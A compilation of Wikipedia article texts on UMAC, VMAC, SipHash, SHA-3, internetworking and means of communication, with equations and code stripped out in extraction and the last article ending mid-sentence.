Incryptography, auniversal hashing message authentication code, orUMAC, is amessage authentication code(MAC) calculated usinguniversal hashing, which involves choosing a hash function from a class of hash functions according to some secret (random) process and applying it to the message. The resulting digest or fingerprint is then encrypted to hide the identity of the hash function that was used. A variation of the scheme was first published in 1999.[1]As with any MAC, it may be used to simultaneously verify both thedata integrityand theauthenticityof amessage. In contrast to traditional MACs, which areserializable, a UMAC can be executed inparallel. Thus, as machines continue to offer more parallel-processing capabilities, the speed of implementing UMAC can increase.[1] A specific type of UMAC, also commonly referred to just as "UMAC", is described in aninformational RFCpublished as RFC 4418 in March 2006. It has provable cryptographic strength and is usually substantially less computationally intensive than other MACs. UMAC's design is optimized for 32-bit architectures withSIMDsupport, with a performance of 1 CPU cycle per byte (cpb) with SIMD and 2 cpb without SIMD. A closely related variant of UMAC that is optimized for 64-bit architectures is given byVMAC, which was submitted to the IETF as a draft in April 2007 (draft-krovetz-vmac-01) but never gathered enough attention to be approved as an RFC. Let's say thehash functionis chosen from a class of hash functions H, which maps messages into D, the set of possible message digests. This class is calleduniversalif, for any distinct pair of messages, there are at most |H|/|D| functions that map them to the same member of D. This means that if an attacker wants to replace one message with another and, from his point of view, the hash function was chosen completely randomly, the probability that the UMAC will not detect his modification is at most 1/|D|. But this definition is not strong enough — if the possible messages are 0 and 1, D={0,1} and H consists of the identity operation andnot, H is universal. But even if the digest is encrypted by modular addition, the attacker can change the message and the digest at the same time and the receiver wouldn't know the difference. A class of hash functions H that is good to use will make it difficult for an attacker to guess the correct digestdof a fake messagefafter intercepting one messageawith digestc. In other words, needs to be very small, preferably 1/|D|. It is easy to construct a class of hash functions whenDisfield. For example, if |D| isprime, all the operations are takenmodulo|D|. The messageais then encoded as ann-dimensional vector overD(a1,a2, ...,an).Hthen has |D|n+1members, each corresponding to an(n+ 1)-dimensional vector overD(h0,h1, ...,hn). If we let we can use the rules of probabilities and combinatorics to prove that If we properly encrypt all the digests (e.g. with aone-time pad), an attacker cannot learn anything from them and the same hash function can be used for all communication between the two parties. This may not be true forECBencryption because it may be quite likely that two messages produce the same hash value. Then some kind ofinitialization vectorshould be used, which is often called thenonce. It has become common practice to seth0=f(nonce), wherefis also secret. Notice that having massive amounts of computer power does not help the attacker at all. If the recipient limits the amount of forgeries it accepts (by sleeping whenever it detects one), |D| can be 232or smaller. The followingCfunction generates a 24 bit UMAC. It assumes thatsecretis a multiple of 24 bits,msgis not longer thansecretandresultalready contains the 24 secret bits e.g. f(nonce). nonce does not need to be contained inmsg. Functions in the above unnamed[citation needed]strongly universal hash-function family usesnmultiplies to compute a hash value. The NH family halves the number of multiplications, which roughly translates to a two-fold speed-up in practice.[2]For speed, UMAC uses the NH hash-function family. NH is specifically designed to useSIMDinstructions, and hence UMAC is the first MAC function optimized for SIMD.[1] The following hash family is2−w{\displaystyle 2^{-w}}-universal:[1] where Practically, NH is done in unsigned integers. All multiplications are mod 2^w, all additions mod 2^w/2, and all inputs as are a vector of half-words (w/2=32{\displaystyle w/2=32}-bit integers). The algorithm will then use⌈k/2⌉{\displaystyle \lceil k/2\rceil }multiplications, wherek{\displaystyle k}was the number of half-words in the vector. Thus, the algorithm runs at a "rate" of one multiplication per word of input. RFC 4418 is aninformational RFCthat describes a wrapping of NH for UMAC. The overall UHASH ("Universal Hash Function") routine produces a variable length of tags, which corresponds to the number of iterations (and the total lengths of keys) needed in all three layers of its hashing. Several calls to an AES-basedkey derivation functionis used to provide keys for all three keyed hashes. In RFC 4418, NH is rearranged to take a form of: This definition is designed to encourage programmers to use SIMD instructions on the accumulation, since only data with four indices away are likely to not be put in the same SIMD register, and hence faster to multiply in bulk. On a hypothetical machine, it could simply translate to:
https://en.wikipedia.org/wiki/UMAC_(cryptography)
VMACis ablock cipher-basedmessage authentication code(MAC) algorithm using auniversal hashproposed by Ted Krovetz andWei Daiin April 2007. The algorithm was designed for high performance backed by a formal analysis.[citation needed] VMAC is designed to have exceptional performance in software on 64-bit CPU architectures while still performing well on 32-bit architectures.[citation needed]Measured speeds are as fast as one-half CPU cycle per byte (cpb) on 64-bit architectures, under five cpb on desktop 32-bit processors, and around ten cpb on embedded 32-bit architectures.[1]A closely related variant of VMAC that is optimized for 32-bit architectures is given byUMAC. VMAC is a MAC in the style of Wegman and Carter.[2][3]A fast "universal" hash function is used to hash an input message M into a short string.[citation needed]This short string is then combined by addition with a pseudorandom pad, resulting in the VMAC tag. Security depends on the sender and receiver sharing a randomly chosen secret hash function and pseudorandom pad. This is achieved by using keyed hash function H and pseudorandom function F. A tag is generated by performing the computation where K1 and K2 are secret random keys shared by sender and receiver, and Nonce is a value that changes with each generated tag. The receiver needs to know which nonce was used by the sender, so some method of synchronizing nonces needs to be used. This can be done by explicitly sending the nonce along with the message and tag, or agreeing upon the use of some other non-repeating value such as a sequence number. The nonce need not be kept secret, but care needs to be taken to ensure that, over the lifetime of a VMAC key, a different nonce is used with each message. VMAC uses a function, called VHASH (also specified in this document), as the keyed hash function H and uses a pseudorandom function F whose default implementation uses the AES block cipher. VMAC allows for tag lengths of any 64-bit multiple up to the block size of the block cipher in use. When using AES, this means VMAC can produce 64- or 128-bit tags. The theory of Wegman-Carter MACs and the analysis of VMAC show that if one "instantiates" VMAC with truly random keys and pads then the probability that an attacker (even a computationally unbounded one) produces a correct tag for messages of its choosing is less than 1/260or 1/2120when the tags are of length 64 or 128 bits, respectively. When an attacker makes N forgery attempts the probability of getting one or more tags right increases linearly to less than N/260or N/2120. In an applied implementation of VMAC, using AES to produce keys and pads, these forgery probabilities increase by a small amount related to the security of AES. As long as AES is secure, this small additive term is insignificant for any practical attack. See specification for more details. Analysis of VMAC security has been carried out by authors Wei Dai and Ted Krovetz.[citation needed][4]
https://en.wikipedia.org/wiki/VMAC
SipHashis anadd–rotate–xor(ARX) based family ofpseudorandom functionscreated by Jean-Philippe Aumasson andDaniel J. Bernsteinin 2012,[1]: 165[2]in response to a spate of"hash flooding"denial-of-service attacks(HashDoS) in late 2011.[3] SipHash is designed as asecure pseudorandom functionand can also be used as a securemessage authentication code(MAC). SipHash, however, is not a general purpose key-lesshash functionsuch asSecure Hash Algorithms(SHA) and therefore must always be used with a secret key in order to be secure. That is, SHA is designed so that it is difficult for an attacker to find two messagesXandYsuch that SHA(X) = SHA(Y), even though anyone may compute SHA(X). SipHash instead guarantees that, having seenXiand SipHash(Xi,k), an attacker who does not know the keykcannot find (any information about)kor SipHash(Y,k) for any messageY∉ {Xi} which they have not seen before. SipHash computes a64-bitmessage authentication codefrom a variable-length message and 128-bit secret key. It was designed to be efficient even for short inputs, with performance comparable to non-cryptographic hash functions, such asCityHash;[4]: 496[2]this can be used to prevent denial-of-service attacks againsthash tables("hash flooding"),[5]or to authenticatenetwork packets. A variant was later added which produces a 128-bit result.[6] An unkeyed hash function such as SHA is collision-resistant only if the entire output is used. If used to generate asmalloutput, such as an index into a hash table of practical size, then no algorithm can prevent collisions; an attacker need only make as many attempts as there are possible outputs. For example, suppose a network server is designed to be able to handle up to a million requests at once. It keeps track of incoming requests in a hash table with two million entries, using a hash function to map identifying information from each request to one of the two million possible table entries. An attacker who knows the hash function need only feed it arbitrary inputs; one out of two million will have a specific hash value. If the attacker now sends a few hundred requests all chosen to have thesamehash value to the server, that will produce a large number of hash collisions, slowing (or possibly stopping) the server with an effect similar to apacket floodof many million requests.[7] By using a key unknown to the attacker, a keyed hash function like SipHash prevents this sort of attack. While it is possible to add a key to an unkeyed hash function (HMACis a popular technique), SipHash is much more efficient. Functions in SipHash family are specified as SipHash-c-d, wherecis the number of rounds per message block anddis the number of finalization rounds. The recommended parameters are SipHash-2-4 for best performance, and SipHash-4-8 for conservative security. A few languages use SipHash-1-3 for performance at the risk of yet-unknown DoS attacks.[8] Thereference implementationwas released aspublic domain softwareunder theCC0.[6] SipHash is used inhash tableimplementationsof various software:[9] The following programs use SipHash in other ways: Implementations
https://en.wikipedia.org/wiki/SipHash
SHA-3(Secure Hash Algorithm 3) is the latest[4]member of theSecure Hash Algorithmfamily of standards, released byNISTon August 5, 2015.[5][6][7]Although part of the same series of standards, SHA-3 is internally different from theMD5-likestructureofSHA-1andSHA-2. SHA-3 is a subset of the broader cryptographic primitive familyKeccak(/ˈkɛtʃæk/or/ˈkɛtʃɑːk/),[8][9]designed byGuido Bertoni,Joan Daemen,Michaël Peeters, andGilles Van Assche, building uponRadioGatún. Keccak's authors have proposed additional uses for the function, not (yet) standardized by NIST, including astream cipher, anauthenticated encryptionsystem, a "tree" hashing scheme for faster hashing on certain architectures,[10][11]andAEADciphers Keyak and Ketje.[12][13] Keccak is based on a novel approach calledsponge construction.[14]Sponge construction is based on a wide random function or randompermutation, and allows inputting ("absorbing" in sponge terminology) any amount of data, and outputting ("squeezing") any amount of data, while acting as a pseudorandom function with regard to all previous inputs. This leads to great flexibility. As of 2022, NIST does not plan to withdraw SHA-2 or remove it from the revised Secure Hash Standard.[15]The purpose of SHA-3 is that it can be directly substituted for SHA-2 in current applications if necessary, and to significantly improve the robustness of NIST's overall hash algorithm toolkit.[16] For small message sizes, the creators of the Keccak algorithms and the SHA-3 functions suggest using the faster functionKangarooTwelvewith adjusted parameters and a new tree hashing mode without extra overhead. The Keccak algorithm is the work of Guido Bertoni,Joan Daemen(who also co-designed theRijndaelcipher withVincent Rijmen), Michaël Peeters, andGilles Van Assche. It is based on earlier hash function designsPANAMAandRadioGatún. PANAMA was designed by Daemen and Craig Clapp in 1998. RadioGatún, a successor of PANAMA, was designed by Daemen, Peeters, and Van Assche, and was presented at the NIST Hash Workshop in 2006.[17]Thereference implementationsource codewas dedicated topublic domainviaCC0waiver.[18] In 2006,NISTstarted to organize theNIST hash function competitionto create a new hash standard, SHA-3. SHA-3 is not meant to replaceSHA-2, as no significant attack on SHA-2 has been publicly demonstrated[needs update]. Because of the successful attacks onMD5,SHA-0andSHA-1,[19][20]NIST perceived a need for an alternative, dissimilar cryptographic hash, which became SHA-3. After a setup period, admissions were to be submitted by the end of 2008. Keccak was accepted as one of the 51 candidates. In July 2009, 14 algorithms were selected for the second round. Keccak advanced to the last round in December 2010.[21] During the competition, entrants were permitted to "tweak" their algorithms to address issues that were discovered. Changes that have been made to Keccak are:[22][23] On October 2, 2012, Keccak was selected as the winner of the competition.[8] In 2014, the NIST published a draftFIPS202 "SHA-3 Standard: Permutation-Based Hash and Extendable-Output Functions".[24]FIPS 202 was approved on August 5, 2015.[25] On August 5, 2015, NIST announced that SHA-3 had become a hashing standard.[26] In early 2013 NIST announced they would select different values for the "capacity", the overall strength vs. speed parameter, for the SHA-3 standard, compared to the submission.[27][28]The changes caused some turmoil. The hash function competition called for hash functions at least as secure as the SHA-2 instances. It means that ad-bit output should haved/2-bit resistance tocollision attacksandd-bit resistance topreimage attacks, the maximum achievable fordbits of output. Keccak's security proof allows an adjustable level of security based on a "capacity"c, providingc/2-bit resistance to both collision and preimage attacks. To meet the original competition rules, Keccak's authors proposedc= 2d. The announced change was to accept the samed/2-bit security for all forms of attack and standardizec=d. This would have sped up Keccak by allowing an additionaldbits of input to be hashed each iteration. However, the hash functions would not have been drop-in replacements with the same preimage resistance as SHA-2 any more; it would have been cut in half, making it vulnerable to advances in quantum computing, which effectively would cut it in half once more.[29] In September 2013,Daniel J. Bernsteinsuggested on theNISThash-forum mailing list[30]to strengthen the security to the 576-bit capacity that was originally proposed as the default Keccak, in addition to and not included in the SHA-3 specifications.[31]This would have provided at least a SHA3-224 and SHA3-256 with the same preimage resistance as their SHA-2 predecessors, but SHA3-384 and SHA3-512 would have had significantly less preimage resistance than their SHA-2 predecessors. In late September, the Keccak team responded by stating that they had proposed 128-bit security by settingc= 256as an option already in their SHA-3 proposal.[32]Although the reduced capacity was justifiable in their opinion, in the light of the negative response, they proposed raising the capacity toc= 512bits for all instances. This would be as much as any previous standard up to the 256-bit security level, while providing reasonable efficiency,[33]but not the 384-/512-bit preimage resistance offered by SHA2-384 and SHA2-512. The authors stated that "claiming or relying onsecurity strengthlevels above 256 bits is meaningless". In early October 2013,Bruce Schneiercriticized NIST's decision on the basis of its possible detrimental effects on the acceptance of the algorithm, saying: There is too much mistrust in the air. NIST risks publishing an algorithm that no one will trust and no one (except those forced) will use.[34] He later retracted his earlier statement, saying: I misspoke when I wrote that NIST made "internal changes" to the algorithm. That was sloppy of me. The Keccak permutation remains unchanged. What NIST proposed was reducing the hash function's capacity in the name of performance. One of Keccak's nice features is that it's highly tunable.[34] Paul Crowley, a cryptographer and senior developer at an independent software development company, expressed his support of the decision, saying that Keccak is supposed to be tunable and there is no reason for different security levels within one primitive. He also added: Yes, it's a bit of a shame for the competition that they demanded a certain security level for entrants, then went to publish a standard with a different one. But there's nothing that can be done to fix that now, except re-opening the competition. Demanding that they stick to their mistake doesn't improve things for anyone.[35] There was some confusion that internal changes may have been made to Keccak, which were cleared up by the original team, stating that NIST's proposal for SHA-3 is a subset of the Keccak family, for which one can generate test vectors using their reference code submitted to the contest, and that this proposal was the result of a series of discussions between them and the NIST hash team.[36] In response to the controversy, in November 2013 John Kelsey of NIST proposed to go back to the originalc= 2dproposal for all SHA-2 drop-in replacement instances.[37]The reversion was confirmed in subsequent drafts[38]and in the final release.[5] SHA-3 uses thesponge construction,[14]in which data is "absorbed" into the sponge, then the result is "squeezed" out. In the absorbing phase, message blocks areXORedinto a subset of the state, which is then transformed as a whole using apermutation function(ortransformation)f{\displaystyle f}. In the "squeeze" phase, output blocks are read from the same subset of the state, alternated with the state transformation functionf{\displaystyle f}. The size of the part of the state that is written and read is called the "rate" (denotedr{\displaystyle r}), and the size of the part that is untouched by input/output is called the "capacity" (denotedc{\displaystyle c}). The capacity determines the security of the scheme. The maximumsecurity levelis half the capacity. Given an input bit stringN{\displaystyle N}, a padding functionpad{\displaystyle pad}, a permutation functionf{\displaystyle f}that operates on bit blocks of widthb{\displaystyle b}, a rater{\displaystyle r}and an output lengthd{\displaystyle d}, we have capacityc=b−r{\displaystyle c=b-r}and the sponge constructionZ=sponge[f,pad,r](N,d){\displaystyle Z={\text{sponge}}[f,pad,r](N,d)}, yielding a bit stringZ{\displaystyle Z}of lengthd{\displaystyle d}, works as follows:[6]: 18 The fact that the internal stateScontainscadditional bits of information in addition to what is output toZprevents thelength extension attacksthat SHA-2, SHA-1, MD5 and other hashes based on theMerkle–Damgård constructionare susceptible to. In SHA-3, the stateSconsists of a5 × 5array ofw-bit words (withw= 64),b= 5 × 5 ×w= 5 × 5 × 64 = 1600 bits total. Keccak is also defined for smaller power-of-2 word sizeswdown to 1 bit (total state of 25 bits). Small state sizes can be used to test cryptanalytic attacks, and intermediate state sizes (fromw= 8, 200 bits, tow= 32, 800 bits) can be used in practical, lightweight applications.[12][13] For SHA3-224, SHA3-256, SHA3-384, and SHA3-512 instances,ris greater thand, so there is no need for additional block permutations in the squeezing phase; the leadingdbits of the state are the desired hash. However, SHAKE128 and SHAKE256 allow an arbitrary output length, which is useful in applications such asoptimal asymmetric encryption padding. To ensure the message can be evenly divided intor-bit blocks, padding is required. SHA-3 uses the pattern 10...01 in its padding function: a 1 bit, followed by zero or more 0 bits (maximumr− 1) and a final 1 bit. The maximum ofr− 1zero bits occurs when the last message block isr− 1bits long. Then another block is added after the initial 1 bit, containingr− 1zero bits before the final 1 bit. The two 1 bits will be added even if the length of the message is already divisible byr.[6]: 5.1In this case, another block is added to the message, containing a 1 bit, followed by a block ofr− 2zero bits and another 1 bit. This is necessary so that a message with length divisible byrending in something that looks like padding does not produce the same hash as the message with those bits removed. The initial 1 bit is required so messages differing only in a few additional 0 bits at the end do not produce the same hash. The position of the final 1 bit indicates which raterwas used (multi-rate padding), which is required for the security proof to work for different hash variants. Without it, different hash variants of the same short message would be the same up to truncation. The block transformationf, which is Keccak-f[1600] for SHA-3, is a permutation that usesXOR,ANDandNOToperations, and is designed for easy implementation in both software and hardware. It is defined for any power-of-twowordsize,w= 2ℓbits. The main SHA-3 submission uses 64-bit words,ℓ= 6. The state can be considered to be a5 × 5 ×warray of bits. Leta[i][j][k]be bit(5i+j) ×w+kof the input, using alittle-endianbit numbering convention androw-majorindexing. I.e.iselects the row,jthe column, andkthe bit. Index arithmetic is performed modulo 5 for the first two dimensions and modulowfor the third. The basic block permutation function consists of12 + 2ℓrounds of five steps: The speed of SHA-3 hashing of long messages is dominated by the computation off= Keccak-f[1600] and XORingSwith the extendedPi, an operation onb= 1600 bits. However, since the lastcbits of the extendedPiare 0 anyway, and XOR with 0 is a NOP, it is sufficient to perform XOR operations only forrbits (r= 1600 − 2 × 224 = 1152 bits for SHA3-224, 1088 bits for SHA3-256, 832 bits for SHA3-384 and 576 bits for SHA3-512). The lowerris (and, conversely, the higherc=b−r= 1600 −r), the less efficient but more secure the hashing becomes since fewer bits of the message can be XORed into the state (a quick operation) before each application of the computationally expensivef. The authors report the following speeds for software implementations of Keccak-f[1600] plus XORing 1024 bits,[1]which roughly corresponds to SHA3-256: For the exact SHA3-256 on x86-64, Bernstein measures 11.7–12.25 cpb depending on the CPU.[40]: 7SHA-3 has been criticized for being slow on instruction set architectures (CPUs) which do not have instructions meant specially for computing Keccak functions faster – SHA2-512 is more than twice as fast as SHA3-512, and SHA-1 is more than three times as fast on an Intel Skylake processor clocked at 3.2 GHz.[41]The authors have reacted to this criticism by suggesting to use SHAKE128 and SHAKE256 instead of SHA3-256 and SHA3-512, at the expense of cutting the preimage resistance in half (but while keeping the collision resistance). With this, performance is on par with SHA2-256 and SHA2-512. However, inhardware implementations, SHA-3 is notably faster than all other finalists,[42]and also faster than SHA-2 and SHA-1.[41] As of 2018, ARM's ARMv8[43]architecture includes special instructions which enable Keccak algorithms to execute faster and IBM'sz/Architecture[44]includes a complete implementation of SHA-3 and SHAKE in a single instruction. There have also been extension proposals forRISC-Vto add Keccak-specific instructions.[45] The NIST standard defines the following instances, for messageMand output lengthd:[6]: 20, 23 With the following definitions SHA-3 instances are drop-in replacements for SHA-2, intended to have identical security properties. SHAKE will generate as many bits from its sponge as requested, thus beingextendable-output functions(XOFs). For example, SHAKE128(M, 256) can be used as a hash function with a 256 character bitstream with 128-bit security strength. Arbitrarily large lengths can be used as pseudo-random number generators. Alternately, SHAKE256(M, 128) can be used as a hash function with a 128-bit length and 128-bit resistance.[6] All instances append some bits to the message, the rightmost of which represent thedomain separationsuffix. The purpose of this is to ensure that it is not possible to construct messages that produce the same hash output for different applications of the Keccak hash function. The following domain separation suffixes exist:[6][46] In December 2016NISTpublished a new document, NIST SP.800-185,[47]describing additional SHA-3-derived functions: • X is the main input bit string. It may be of any length, including zero. • L is an integer representing the requested output length in bits. • N is a function-name bit string, used by NIST to define functions based on cSHAKE. When no function other than cSHAKE is desired, N is set to the empty string. • S is a customization bit string. The user selects this string to define a variant of the function. When no customization is desired, S is set to the empty string. • K is a key bit string of any length, including zero. • B is the block size in bytes for parallel hashing. It may be any integer such that 0 < B < 22040. In 2016 the same team that made the SHA-3 functions and the Keccak algorithm introduced faster reduced-rounds (reduced to 12 and 14 rounds, from the 24 in SHA-3) alternatives which can exploit the availability of parallel execution because of usingtree hashing: KangarooTwelve and MarsupilamiFourteen.[49] These functions differ from ParallelHash, the FIPS standardized Keccak-based parallelizable hash function, with regard to the parallelism, in that they are faster than ParallelHash for small message sizes. The reduced number of rounds is justified by the huge cryptanalytic effort focused on Keccak which did not produce practical attacks on anything close to twelve-round Keccak. These higher-speed algorithms are not part of SHA-3 (as they are a later development), and thus are not FIPS compliant; but because they use the same Keccak permutation they are secure for as long as there are no attacks on SHA-3 reduced to 12 rounds.[49] KangarooTwelve is a higher-performance reduced-round (from 24 to 12 rounds) version of Keccak which claims to have 128 bits of security[50]while having performance as high as 0.55cycles per byteon aSkylakeCPU.[51]This algorithm is anIETFRFCdraft.[52] MarsupilamiFourteen, a slight variation on KangarooTwelve, uses 14 rounds of the Keccak permutation and claims 256 bits of security. Note that 256-bit security is not more useful in practice than 128-bit security, but may be required by some standards.[50]128 bits are already sufficient to defeat brute-force attacks on current hardware, so having 256-bit security does not add practical value, unless the user is worried about significant advancements in the speed ofclassicalcomputers. For resistance againstquantumcomputers, see below. KangarooTwelve and MarsupilamiFourteen are Extendable-Output Functions, similar to SHAKE, therefore they generate closely related output for a common message with different output length (the longer output is an extension of the shorter output). Such property is not exhibited by hash functions such as SHA-3 or ParallelHash (except of XOF variants).[6] In 2016, the Keccak team released a different construction calledFarfalle construction, and Kravatte, an instance of Farfalle using the Keccak-p permutation,[53]as well as two authenticated encryption algorithms Kravatte-SANE and Kravatte-SANSE[54] RawSHAKE is the basis for the Sakura coding for tree hashing, which has not been standardized yet. Sakura uses a suffix of 1111 for single nodes, equivalent to SHAKE, and other generated suffixes depending on the shape of the tree.[46]: 16 There is a general result (Grover's algorithm) that quantum computers can perform a structuredpreimage attackin2d=2d/2{\displaystyle {\sqrt {2^{d}}}=2^{d/2}}, while a classical brute-force attack needs 2d. A structured preimage attack implies a second preimage attack[29]and thus acollision attack. A quantum computer can also perform abirthday attack, thus break collision resistance, in2d3=2d/3{\displaystyle {\sqrt[{3}]{2^{d}}}=2^{d/3}}[55](although that is disputed).[56]Noting that the maximum strength can bec/2{\displaystyle c/2}, this gives the following upper[57]bounds on the quantum security of SHA-3: It has been shown that theMerkle–Damgård construction, as used by SHA-2, is collapsing and, by consequence, quantum collision-resistant,[58]but for the sponge construction used by SHA-3, the authors provide proofs only for the case when the block functionfis not efficiently invertible; Keccak-f[1600], however, is efficiently invertible, and so their proof does not apply.[59][original research] The following hash values are from NIST.gov:[60] Changing a single bit causes each bit in the output to change with 50% probability, demonstrating anavalanche effect: In the table below,internal statemeans the number of bits that are carried over to the next block. Optimized implementation usingAVX-512VL(i.e. fromOpenSSL, running onSkylake-XCPUs) of SHA3-256 do achieve about 6.4 cycles per byte for large messages,[66]and about 7.8 cycles per byte when usingAVX2onSkylakeCPUs.[67]Performance on other x86, Power and ARM CPUs depending on instructions used, and exact CPU model varies from about 8 to 15 cycles per byte,[68][69][70]with some older x86 CPUs up to 25–40 cycles per byte.[71] Below is a list of cryptography libraries that support SHA-3: Apple A13ARMv8 six-coreSoCCPU cores have support[72]for accelerating SHA-3 (and SHA-512) using specialized instructions (EOR3, RAX1, XAR, BCAX) from ARMv8.2-SHA crypto extension set.[73] Some software libraries usevectorizationfacilities of CPUs to accelerate usage of SHA-3. For example, Crypto++ can useSSE2on x86 for accelerating SHA3,[74]andOpenSSLcan useMMX,AVX-512orAVX-512VLon many x86 systems too.[75]AlsoPOWER8CPUs implement 2x64-bit vector rotate, defined in PowerISA 2.07, which can accelerate SHA-3 implementations.[76]Most implementations for ARM do not useNeonvector instructions asscalar codeis faster. ARM implementations can however be accelerated usingSVEand SVE2 vector instructions; these are available in theFujitsu A64FXCPU for instance.[77] The IBMz/Architecturesupports SHA-3 since 2017 as part of the Message-Security-Assist Extension 6.[78]The processors support a complete implementation of the entire SHA-3 and SHAKE algorithms via the KIMD and KLMD instructions using a hardware assist engine built into each core. Ethereumuses the Keccak-256 hash function (as per version 3 of the winning entry to the SHA-3 contest by Bertoni et al., which is different from the final SHA-3 specification).[79]
https://en.wikipedia.org/wiki/SHA-3#Additional_instances
Internetworkingis the practice ofinterconnectingmultiplecomputer networks.[1]: 169Typically, this enables any pair ofhostsin the connected networks to exchange messages irrespective of their hardware-level networking technology. The resulting system of interconnected networks is called aninternetwork, or simply aninternet. The most notable example of internetworking is theInternet, a network of networks based on many underlying hardware technologies. The Internet is defined by a unifiedglobal addressing system,packetformat, androutingmethods provided by theInternet Protocol.[2]: 103 The terminternetworkingis a combination of the componentsinter(between) andnetworking. An earlier term for an internetwork iscatenet,[3]a short-form of(con)catenating networks. The first international heterogenousresource sharingnetwork was developed by the computer science department atUniversity College London(UCL) who interconnected theARPANETwith earlyBritish academic networksbeginning in 1973.[4][5][6]In the ARPANET, the network elements used to connect individual networks were calledgateways, but the term has been deprecated in this context, because of possible confusion with functionally different devices. By 1973-4, researchers in France, the United States, and the United Kingdom had worked out an approach to internetworking where the differences between network protocols were hidden by using a common internetwork protocol, and instead of the network being responsible for reliability, as in the ARPANET, the hosts became responsible, as demonstrated in theCYCLADESnetwork.[7][8][9]Researchers atXerox PARCoutlined the idea ofEthernetand thePARC Universal Packet(PUP) for internetworking.[10][11]Research at theNational Physical Laboratoryin the United Kingdom confirmed establishing a common host protocol would be more reliable and efficient.[12]The ARPANET connection to UCL later evolved intoSATNET. In 1977, ARPA demonstrated a three-way internetworking experiment, which linked a mobile vehicle inPRNETwith nodes in the ARPANET, and, via SATNET, to nodes at UCL. TheX.25protocol, on whichpublic data networkswere based in the 1970s and 1980s, was supplemented by theX.75protocol which enabled internetworking. Today the interconnecting gateways are calledrouters. The definition of an internetwork today includes the connection of other types of computer networks such aspersonal area networks. Catenet, a short-form of(con)catenating networks,is obsolete terminolgy for a system ofpacket-switchedcommunication networks interconnected viagateways.[3] The term was coined byLouis Pouzin, who designed theCYCLADESnetwork, in an October 1973 note circulated to theInternational Network Working Group,[13][14]which was published in a 1974 paper "A Proposal for Interconnecting Packet Switching Networks".[15]Pouzin was a pioneer of internetworking at a time whennetworkmeant what is now called alocal area network. Catenet was the concept of linking these networks into anetwork of networkswith specifications for compatibility of addressing and routing. The term was used in technical writing in the late 1970s and early 1980s,[16]including inRFCsandIENs.[17]Catenet was gradually displaced by the short-form of the term internetwork,internet(lower-casei), when theInternet Protocolspread more widely from the mid 1980s and the use of the term internet took on a broader sense and became well known in the 1990s.[18][19][20][21][22][23][24][25] Internetworking, a combination of the componentsinter(between) andnetworking, started as a way to connect disparate types of networking technology, but it became widespread through the developing need to connect two or morelocal area networksvia some sort ofwide area network. To build an internetwork, the following are needed:[2]: 103A standardized scheme toaddresspackets to any host on any participating network; a standardizedprotocoldefining format and handling of transmitted packets; components interconnecting the participating networks byroutingpackets to their destinations based on standardized addresses. Another type of interconnection of networks often occurs within enterprises at thelink layerof the networking model, i.e. at the hardware-centric layer below the level of the TCP/IP logical interfaces. Such interconnection is accomplished withnetwork bridgesandnetwork switches. This is sometimes incorrectly termed internetworking, but the resulting system is simply a larger, singlesubnetwork, and no internetworkingprotocol, such asInternet Protocol, is required to traverse these devices. However, a single computer network may be converted into an internetwork by dividing the network into segments and logically dividing the segment traffic with routers and having an internetworking software layer that applications employ. The Internet Protocol is designed to provide anunreliable(not guaranteed)packet serviceacross the network. The architecture avoids intermediate network elements maintaining any state of the network. Instead, this function is assigned to the endpoints of each communication session. To transfer data reliably, applications must utilize an appropriatetransport layerprotocol, such asTransmission Control Protocol(TCP), which provides areliable stream. Some applications use a simpler, connection-less transport protocol,User Datagram Protocol(UDP), for tasks which do not require reliable delivery of data or that require real-time service, such asvideo streaming[26]or voice chat. Two architectural models are commonly used to describe the protocols and methods used in internetworking. TheOpen System Interconnection(OSI) reference model was developed under the auspices of theInternational Organization for Standardization(ISO) and provides a rigorous description for layering protocol functions from the underlying hardware to the software interface concepts in user applications. Internetworking is implemented in theNetwork Layer(Layer 3) of the model. TheInternet Protocol Suite, also known as the TCP/IP model, was not designed to conform to the OSI model and does not refer to it in any of the normative specifications inRequest for CommentsandInternet standards. Despite similar appearance as a layered model, it has a much less rigorous, loosely defined architecture that concerns itself only with the aspects of the style of networking in its own historical provenance. It assumes the availability of any suitable hardware infrastructure, without discussing hardware-specific low-level interfaces, and that a host has access to this local network to which it is connected via a link layer interface. For a period in the late 1980s and early 1990s, the network engineering community was polarized over the implementation of competing protocol suites, commonly known as theProtocol Wars. It was unclear which of the OSI model and the Internet protocol suite would result in the best and most robust computer networks.[27][28][29]
https://en.wikipedia.org/wiki/Internetworking
Means of communicationare used by people to communicate and exchange information with each other as aninformation senderand areceiver. Many different materials are used in communication. Maps, for example, save tedious explanations on how to get to a destination. A means of communication is therefore a means to an end to make communication between people easier, more understandable and, above all, clearer. In everyday language, the termmeans of communicationis often equated with themedium. However, the term "medium" is used inmedia studiesto refer to a large number of concepts, some of which do not correspond to everyday usage.[1][2] Means of communication are used for communication between sender and recipient and thus for the transmission of information. Elements of communication include a communication-triggering event, sender and recipient, ameans of communication, apath of communicationandcontents of communication.[3]The path of communication is the path that a message travels between sender and recipient; inhierarchiesthevertical line of communicationis identical tocommand hierarchies.[4]Paths of communication can bephysical(e.g. the road as transportation route) ornon-physical(e.g. networks like acomputer network).Contents of communicationcan be for example photography, data,graphics, language, ortexts. Means of communication in the narrower sense refer to technical devices that transmit information.[5]They are the manifestations of contents of communication that can be perceived through the senses and replace the communication that originally ran from person to person and make themreproducible.[6] The role ofregulatory authorities(license broadcaster institutions,content providers, platforms) and the resistance to political and commercial interference in the autonomy of the media sector are both considered as significant components ofmedia independence. In order to ensure media independence, regulatory authorities should be placed outside of governments' directives. This can be measured through legislation, agency statutes and rules.[7] In the United States, theRadio Act of 1927established that theradio frequency spectrumwaspublic property. This prohibitedprivate organizationsfrom owning any portion of the spectrum.[8]Abroadcast licenseis typically given to broadcasters by communications regulators, allowing them to broadcast on a certain frequency and typically in a specific geographical location. Licensing is done by regulators in order to manage a broadcasting medium and as a method to prevent the concentration of media ownership.[9] Licensing has been criticized for an alleged lack oftransparency. Regulatory authorities in certain countries have been accused of exhibitingpolitical biasin favor of the government or ruling party, which has resulted in some prospective broadcasters being denied licenses or being threatened with license withdrawal. As a consequence, there has been a decrease in diversity of content and views in certain countries due to actions made against broadcasters by states via their licensing authorities. This can have an impact on competition and may lead to an excessive concentration of power with potential influence on public opinion.[10]Examples include the failure to renew or retain licenses for editorially critical media, reducing the regulator's competences and mandates for action, and a lack of due process in the adoption of regulatory decisions.[11] Governments worldwide have sought to extend regulation to internet companies, whetherconnectivity providersorapplication service providers, and whether domestically or foreign-based. The impact on journalistic content can be severe, as internet companies can err too much on the side of caution and take down news reports, including algorithmically, while offering inadequate opportunities for redress to the affected 